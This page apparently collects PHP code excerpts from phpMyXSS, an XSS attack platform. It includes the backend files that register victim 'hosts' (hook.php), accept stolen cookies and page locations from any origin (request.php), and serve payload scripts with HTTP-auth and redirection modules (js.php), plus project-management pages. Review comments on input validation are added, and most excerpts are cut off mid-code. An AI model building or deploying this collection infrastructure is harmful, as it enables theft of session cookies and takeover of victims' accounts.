コード例 #1
ファイル: hook.php プロジェクト: mtpkiss/phpMyXSS
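// Request path relative to the site root, split into '/'-separated segments.
$current_url = get_url();
$URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL));
$uri = explode('/', $URI);
// Validate the path shape BEFORE indexing into it. Reading $uri[2] on a short path
// raises an undefined-offset warning; if warnings are displayed, that text lands in
// the JavaScript response and is emitted ahead of the header() call below.
if (count($uri) < 4 || strlen($uri[3]) != 50) {
    header('Content-Type: text/javascript; charset=utf-8');
    die("/*null*/");
}
// Project string ID: the first 8 characters of the third path segment.
$saltid = substr($uri[2], 0, 8);
// String ID of the XSS-vulnerable page (exactly 50 characters, checked above).
// NOTE(review): this value comes straight from the URL and only its length is
// validated here; confirm that pmxHost (defined elsewhere) binds it as a query
// parameter and escapes it wherever it is displayed.
$sid = $uri[3];
$pmxProj = new pmxProject();
$pmxHost = new pmxHost();
// An unknown project ID gets the same empty response as a malformed path.
if ($pmxProj->isExistSaltID($saltid) == FALSE) {
    header('Content-Type: text/javascript; charset=utf-8');
    die("/*null*/");
}
// Numeric project ID for the salt ID (method name spelled as in the project).
$pid = $pmxProj->getIDbySlatID($saltid);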
/**
 * 判断是否第一次上线
 */
if ($pmxHost->isExistSaltID($sid) == FALSE) {
    $pmxHost->addHost($pid, $sid);
    // 添加主机
} else {
    $pmxHost->updateHost($sid);
    // 更新主机信息
コード例 #2
ファイル: request.php プロジェクト: mtpkiss/phpMyXSS
<?php

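/** Entry-point marker: include files check this constant to refuse direct loading. */
define("PMX_ENTRANCE", true);
require dirname(__FILE__) . '/public-init.php';
// The wildcard lets a page on any origin read this endpoint's response.
header("Access-Control-Allow-Origin:*");
header('Content-Type: text/json; charset=utf-8');
// Request path relative to the site root, split into '/'-separated segments.
$current_url = get_url();
$URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL));
$uri = explode('/', $URI);
// A path without a third segment cannot name a project. Stop here instead of
// reading an undefined offset, which would print a warning into the response body.
if (!isset($uri[2])) {
    exit;
}
// Project string ID: the first 8 characters of the third path segment.
$saltid = substr($uri[2], 0, 8);
$pmxProj = new pmxProject();
if ($pmxProj->isExistSaltID($saltid) == FALSE) {
    exit;
}
$id = $pmxProj->getIDbySlatID($saltid);
$detail = $pmxProj->getDetail($id);
// Projects whose status is 0 accept no data.
if ($detail['status'] == 0) {
    exit;
}
// Everything below is untrusted, request-supplied data.
// NOTE(review): what is done with these values happens outside this excerpt; confirm
// they are stored via bound parameters and escaped when rendered in the admin UI.
$request_data = isset($_REQUEST) ? $_REQUEST : array();
$location = isset($_REQUEST["location"]) ? $_REQUEST["location"] : "";
$toplocation = isset($_REQUEST["toplocation"]) ? $_REQUEST["toplocation"] : "";
$cookies = isset($_REQUEST["cookies"]) ? $_REQUEST["cookies"] : "";
// The named fields were copied out above, so drop them from the generic bag.
// unset() is a no-op for keys that are absent, so no isset() guard is needed.
unset($request_data["location"], $request_data["toplocation"]);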
if (isset($request_data["cookies"])) {
コード例 #3
ファイル: add-project.php プロジェクト: mtpkiss/phpMyXSS
                }
            } else {
                if (isset($_POST["mod_" . $modid_item . "_" . $var])) {
                    $val = $_POST["mod_" . $modid_item . "_" . $var];
                    $modconfig[] = array($modid_item, $var, $val);
                }
            }
        }
    }
}
/**
 * Check that the submitted fields are complete and correct: the title must be
 * non-empty and each option must appear in its allow-list.
 *
 * NOTE(review): in_array() is called without its strict flag, so values are compared
 * loosely. The $allow_* lists are defined outside this excerpt; confirm their element
 * types before treating this as a tight allow-list.
 */
$inputIsValid = $title != ""
    && in_array($status, $allow_optionStatus)
    && in_array($protect, $allow_optionProtect)
    && in_array($mailAlert, $allow_optionMail);
if (!$inputIsValid) {
    die("Error: Something you input is invalid.");
}
$pmxProj = new pmxProject($title, $desc, $status, $protect, $mailAlert, $mail, $comments, $modid, $modconfig);
/**
 * Refuse a project name that already exists.
 */
if ($pmxProj->isExistName($title)) {
    die("Error: Duplicate project name.");
}
/**
 * Add the project and report the outcome. The title is user input, so it is passed
 * through esc_html() before being echoed back.
 */
echo $pmxProj->addProj()
    ? "Success: You have added project \"" . esc_html($title) . "\" successful"
    : "Error: Sorry. We are fail to add the project \"" . esc_html($title) . "\".";
コード例 #4
ファイル: start-project.php プロジェクト: mtpkiss/phpMyXSS
<?php

/**
 * Start a project.
 *
 * This script changes state based on a GET parameter. The only request-forgery check
 * visible here is pmx_validate_token(), whose implementation is outside this excerpt.
 */
if (defined("PMX_ENTRANCE") === false) {
    // Loaded directly rather than through the entry point: pretend the file is absent.
    header("HTTP/1.0 404 Not Found");
    exit;
}
header('Content-Type: text/html; charset=utf-8');
if (pmx_validate_token() == false) {
    die("Error: Token is incorrect.");
}
// intval() forces the id to an integer, so the echo below cannot carry markup.
$id = NULL;
if (isset($_GET["id"])) {
    $id = intval($_GET["id"]);
}
$pmxProj = new pmxProject();
if ($pmxProj->isExistID($id) == false) {
    die("Error: The project id is non-existent.");
}
// Nothing is printed when startProj() reports failure.
$started = $pmxProj->startProj($id);
if ($started) {
    echo "Success: You have started the project {$id} successful.";
}
コード例 #5
ファイル: edit-project.php プロジェクト: mtpkiss/phpMyXSS
<?php

// Loaded directly rather than through the entry point: answer 404 and stop.
if (defined("PMX_ENTRANCE") === false) {
    header("HTTP/1.0 404 Not Found");
    exit;
}
pmx_require_header("Edit Project");
pmx_require_nav("");
// intval() forces the requested id to an integer; a missing parameter leaves it NULL.
$id = NULL;
if (isset($_GET["id"])) {
    $id = intval($_GET["id"]);
}
$pmxProj = new pmxProject();
if ($pmxProj->isExistID($id) == false) {
    die("Error: The Project id is non-existent.");
}
// Load the stored project; its 'mods' field is JSON, decoded to an associative array.
// NOTE(review): the fields of $data are rendered into the form below; confirm each is
// escaped for its HTML context (that part of the template is outside this excerpt).
$data = $pmxProj->getDetail($id);
$modids = json_decode($data['mods'], true);
?>
<div class="main">
	<div class="main-item-single main-item-add-proj pull-left">
		<form class="form-horizontal" id="form-add-proj"
			action="<?php 
echo pmx_getactionurl_saveproj();
?>
" method="POST"
			role="form">
			<div
				class="main-item-single-left main-item-single-addproj-setting  pull-left">
				<div class="add-proj-item add-proj-item-1">
					<div class="form-group">
						<label for="inputTitle" class="col-sm-2 control-label">Title</label>
						<div class="col-sm-9">
							<input type="text" name="title" class="form-control"
コード例 #6
ファイル: js.php プロジェクト: ambulong/phpMyXSS
<?php

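/** Entry-point marker: include files check this constant to refuse direct loading. */
define("PMX_ENTRANCE", true);
require dirname(__FILE__) . '/public-init.php';
// Request path relative to the site root, normalised to start with '/'.
$current_url = get_url();
$URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL));
if (substr($URI, 0, 1) !== '/') {
    $URI = '/' . $URI;
}
$uri = explode('/', $URI);
// A path without a third segment cannot name a project. Answer with the same empty
// script as an unknown project instead of reading an undefined offset: a displayed
// warning would be emitted ahead of the Content-Type header and corrupt the response.
if (!isset($uri[2])) {
    header('Content-Type: text/javascript; charset=utf-8');
    die("/*null*/");
}
// Project string ID: the first 8 characters of the third path segment.
$saltid = substr($uri[2], 0, 8);
$pmxProj = new pmxProject();
if ($pmxProj->isExistSaltID($saltid) == FALSE) {
    header('Content-Type: text/javascript; charset=utf-8');
    die("/*null*/");
}
$id = $pmxProj->getIDbySlatID($saltid);
$detail = $pmxProj->getDetail($id);
// 'mods' is stored as JSON and decoded to an associative array.
// NOTE(review): json_decode() returns null on malformed input; code that counts
// $mods later should allow for that.
$mods = json_decode($detail['mods'], true);
// Projects whose status is 0 serve only the empty script.
if ($detail['status'] == 0) {
    header('Content-Type: text/javascript; charset=utf-8');
    die("/*null*/");
}
$code = $pmxProj->getCode($id);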
if (count($mods) == 1 && strpos($code, "{pmx.system.module.")) {
    // 判断是否为系统模块
    $mod_httpauth_id = 34;
    $mod_srcredirection_id = 31;
    $mod_config = $pmxProj->getConfig($id);
    if (strpos($code, "{pmx.system.module.httpauth}")) {
コード例 #7
ファイル: save-project.php プロジェクト: mtpkiss/phpMyXSS
    // Collect per-module settings from the form. For each module id, "mod_<id>" names
    // one option or a list of options, and "mod_<id>_<option>" carries that option's value.
    // NOTE(review): ids, option names and values are all request-supplied and are
    // appended without validation in this excerpt; confirm they are checked before use.
    foreach ($modid as $modid_item) {
        if (!isset($_POST["mod_" . $modid_item])) {
            continue;
        }
        $var = $_POST["mod_" . $modid_item];
        if (!is_array($var)) {
            // Single option name.
            if (isset($_POST["mod_" . $modid_item . "_" . $var])) {
                $val = $_POST["mod_" . $modid_item . "_" . $var];
                $modconfig[] = array($modid_item, $var, $val);
            }
            continue;
        }
        // Several option names: record every one that has a posted value.
        foreach ($var as $var_item) {
            if (!isset($_POST["mod_" . $modid_item . "_" . $var_item])) {
                continue;
            }
            $val = $_POST["mod_" . $modid_item . "_" . $var_item];
            $modconfig[] = array($modid_item, $var_item, $val);
        }
    }
}
// The submission is acceptable only when id and title are non-empty and each option
// appears in its allow-list.
// NOTE(review): in_array() is called without its strict flag, so values are compared
// loosely. The $allow_* lists are defined outside this excerpt; confirm their types.
$inputIsValid = $id != ""
    && $title != ""
    && in_array($status, $allow_optionStatus)
    && in_array($protect, $allow_optionProtect)
    && in_array($mailAlert, $allow_optionMail);
if (!$inputIsValid) {
    die("Error: Something you input is invalid.");
}
$pmxProj = new pmxProject($title, $desc, $status, $protect, $mailAlert, $mail, $comments, $modid, $modconfig);
// The id must refer to an existing project.
if (!$pmxProj->isExistID($id)) {
    die("Error: Project id is invalid.");
}
// Apply the update and report the outcome. The title is user input, so it is passed
// through esc_html() before being echoed back.
echo $pmxProj->updateProj($id)
    ? "Success: You have updated project \"" . esc_html($title) . "\" successful"
    : "Error: Sorry. We are fail to update the project \"" . esc_html($title) . "\".";
コード例 #8
ファイル: delete-project.php プロジェクト: mtpkiss/phpMyXSS
<?php

/**
 * Delete a project.
 *
 * This is a destructive action driven by a GET parameter. The only request-forgery
 * check visible here is pmx_validate_token(), whose implementation is outside this
 * excerpt.
 */
if (defined("PMX_ENTRANCE") === false) {
    // Loaded directly rather than through the entry point: pretend the file is absent.
    header("HTTP/1.0 404 Not Found");
    exit;
}
header('Content-Type: text/html; charset=utf-8');
if (pmx_validate_token() == false) {
    die("Error: Token is incorrect.");
}
// intval() forces the id to an integer, so the echo below cannot carry markup.
$id = NULL;
if (isset($_GET["id"])) {
    $id = intval($_GET["id"]);
}
$pmxProj = new pmxProject();
if ($pmxProj->isExistID($id) == false) {
    die("Error: The project id is non-existent.");
}
// Nothing is printed when delProj() reports failure.
$deleted = $pmxProj->delProj($id);
if ($deleted) {
    echo "Success: You have deleted the project {$id} successful.";
}